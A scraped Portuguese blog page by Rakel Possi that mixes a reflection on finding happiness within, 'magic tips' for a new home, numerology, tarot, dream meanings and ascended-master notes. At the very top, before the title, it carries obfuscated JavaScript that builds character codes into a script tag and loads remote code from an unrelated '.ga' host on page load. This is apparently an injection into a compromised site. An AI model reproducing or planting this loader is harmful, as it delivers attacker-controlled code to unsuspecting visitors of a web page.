Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,115,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); O QUE ESTÁ EM SUA MALA SERVE PARA ONDE VOCÊ VAI? | Rakel Possi

O QUE ESTÁ EM SUA MALA SERVE PARA ONDE VOCÊ VAI?

Propaganda

Este contenido también puede ser leído en: Español

 CADASTRE-SE E RECEBA GRATUITAMENTE MEU BOLETIM DIÁRIO

 

 

 

 

 
QUARTO CRESCENTE

MANTRA CABALÍSTICO PARA 2014
7 Raios, 7 Arcanos
7 Portais Abertos
estendo minhas mãos
e recebo a Vitória sobre tudo e todos.
Amém! EU SOU!
 
Olá amigos!
As coisas andam tão mudadas, não é? Parece que o que procuramos tanto tempo, a felicidade, já não está aonde se a procura. Talvez seja porque a procuramos em coisas distantes do seu paradeiro. Felicidade verdadeira vem do interior e não tem tempo definido. O que se origina em algo externo, principalmente se pensando em bens materiais, pode ser uma miragem, uma ilusão. Para quem precisa de uma casa, por exemplo, ou de um carro ao consegui-los a sensação parece ser de felicidade, mas é apenas satisfação por ter realizado algo que precisavam. Assim que o desejo é satisfeito, a felicidade vai acabando e logo se sente falta de algo "a mais". Ser feliz é estar de bem com sua energia interior, com os anseios da sua alma e vejam que isto não tem nada a ver com religião porque na maioria das vezes ela nos afasta da alma, mesmo que preguem o contrário. A alma não precisa do material ela se contenta com o que lhe é importante e que a eleva: um nascer ou por do sol, caminhar sozinhos em silêncio "ouvindo" a natureza, fazer algum trabalho que goste, mexer na terra, tomar banho de chuva, cantar, rir… Em fim, cada alma tem seu desejo! Isto pode parecer muito pouco para os consumidores assumidamente materialistas, mas a diferença que faz na vida de quem assume a vida que deseja é imensa. Tão imensa que faz toda a diferença no seu destino! Para ser feliz de verdade não precisamos de carro último modelo, de casas enormes, joias, viagens para lugares da moda. Tudo isto pode ser muito bom se você tiver condições econômicas e proporcionará momentos lindos, mas durará o tempo da viagem, de olhar as fotos, de contar para alguém, depois… se não tiver algo espiritual nisso tudo já terá que programar outra viagem, desta vez para o "novo" destino da moda e assim por diante. Felicidade se constrói ao longo da vida por pequenos momentos que somados nos permitem perceber que Uah! Somos felizes! É difícil encontrar um jovem que possa definir a felicidade simplesmente porque ainda não tiveram tempo de viver, como para os que não valorizam o interior, depois de uma perda ou dor dizem: era feliz e não sabia… Programe-se a partir de hoje para encontrar o caminho da felicidade; a rota é muito simples e o melhor GPS está em seu coração: siga seus sentimentos e se os encontra contaminados com negatividades, limpe o coração. Faça de conta que está preparando as malas: o que serve e o que não para o lugar ao que vou. Isto não vou levar (mágoas, ressentimentos, tristezas…); isto sim vai me servir para qualquer ocasião: serenidade, paciência, amor, alegria, disposição. Fazer a viagem interior ao encontro das coisas não simples, mas eternamente encantadoras da vida, desperta a felicidade. Caminhe olhando para as árvores e flores, as casas, janelas, sinta como é o ar que bate em seu rosto. Olhe para seu bairro de outra forma, abra-se para que a alma possa se manifestar em você. Com amor da amiga Rakel Possi.
 
DICAS MÁGICAS
– Se estiver procurando casa para morar reze o Salmo 132. Estas são as suas palavras de poder: "Este é o meu repouso para sempre; aqui viverei porque é o meu desejo" Repita 21 vezes às 6h, ao meio dia e às 18:00h. -durante sete dias seguidos. 
– Para fortalecer sua nova casa coloque no centro do terreno ou do apartamento uma ágata marrom, uma pedra de rio e uma vela marrom de sete dias. Deixe até a vela terminar e guarde as pedras na porta de entrada. 
– Usar uma ágata azul ou um topázio desta cor fortalece nossa energia interna. No seu altar acenda uma vela azul intenso e incenso de cravo da Índia. 
 
NUMEROLOGIA O número do dia

09 de fevereiro de 2014 – 9+2+2+1+4 = 18/9 NÚMERO 9: Um bom dia para concluir aquelas coisas que parece que nunca temos tempo para fazer. Hoje o Universo conspira para que o tempo renda mais. Limpe também o coração das mágoas e ressentimentos. Vida nova! Veja mais em NUMEROLOGIA

ANJO CABALÍSTICO 
HAIAIEL Deus Senhor do Universo. 
Coro dos Anjos – Arcanjo Mikael
Ajuda a nos livrar daqueles que nos oprimem. Protege dando vitória e fortalecendo a fé. Influencia os militares e todos os que trabalham com ferro e armas. O Gênio contrário domina a discórdia, influi as traições e os criminosos. 
Salmo 109, vers. 30: Louvarei grandemente ao Senhor com minha boca; louvá-lo-ei entre a multidão. Rezar entre 23:20h e 23:40h, acendendo vela vermelha e incenso de benjoim.

TAROT – A carta do dia 
O LOUCO ou O BOBO Esta carta indica que após muitas idas e voltas estamos prontos para iniciar uma nova fase em nossa vida. Tal vez tenha chegado o momento de dar um pulo e nos arriscarmos. Será esta uma atitude que muitos tacharão como "loucura", mas esta situação fora do comum abrirá as portas para que possamos ir em frente libertando-nos das amarras que nos prendiam. Hoje é dia de ir por caminhos escolhidos por nós mesmos, independente do que os outros possam dizer. No relacionamento afetivo, deve-se tomar cuidado com atitudes irresponsáveis ou imaturas que podem por em risco o casal. Aventure-se em novos empreendimentos mesmo que eles sejam anticonvencionais. A carta corresponde ao Fenestra Tarot.

SONHOS 
GÊMEOS: ter filhos gêmeos: boa sorte; gêmeos diferentes: problemas; gêmeos idênticos: vida longa; ter um irmão gêmeo: receberá ajuda de amigos; sonhar que é do signo de Gêmeos: cuidado com gastos. Veja mais em Sonhos

GRANDE FRATERNIDAD BRANCA
 
A cor de hoje é AZUL

Mestre  Ascenso EL MORYA 
Complemento Divino: MY-RRAH
Arcanjo M
IGUEL  
Complemento Divino: FÉ
Elohin: HÉRCULES 
Complemento Divino: AMAZONAS 
O Mestre El Morya é o mentor dos políticos, governantes, líderes, executivos, conquistadores e todos os que trabalham com a autoridade. Se as características do raio azul: força, determinação, poder, são usadas de modo positivo se diz que a pessoa pertence ao Raio Azul. Pelo contrário, quando em vez de autoridade se tem autoritarismo; no lugar de poder há abusos da mesma e a determinação se transforma em teimosia, se diz que a pessoa está dentro das condições negativas, sem Luz, do mesmo raio e que precisa evoluir até alcançar o lado do bem.
MANTRA: EU SOU A ENERGIA SEM LIMITES. EU SOU A FORÇA DE HÉRCULES. EU SOU!
Vela: AZUL (forte)  Incenso: JASMIM    Pedra: DIAMANTE, ZAFIRA AZUL, LÁPIS-LAZÚLI
Veja mais em Grande Fraternidade Branca

Sobre o autor

Rakel Possi

Psicóloga e Practitioner em PNL. Autora de diversos livros, ela assumiu a missão de preparar e ajudar pessoas e organizações se adaptarem melhor ao momento do universo. A competência com foco no desenvolvimento humano e ecológico é o seu forte. /// En español: Psicóloga y Practitioner en PNL. Autora de diversos libros, asumió la misión de preparar, y ayudar, personas y organizaciones a adaptarse mejor al momento del universo. La competencia con foco en el desarrollo humano y ecológico es su fuerte.

CONTATO RAKEL POSSI

 

WhatsApp - Rakel Possi

Celular - WhatsApp

+55 (13) 991511707

 


 

Email - Rakel Possi

E-mail

[email protected]

 


 

Messenger - Rakel Possi

Messenger - Facebook

Click para enviar mensagem

 

Facebook Rakel Possi

Instagram Rakel Possi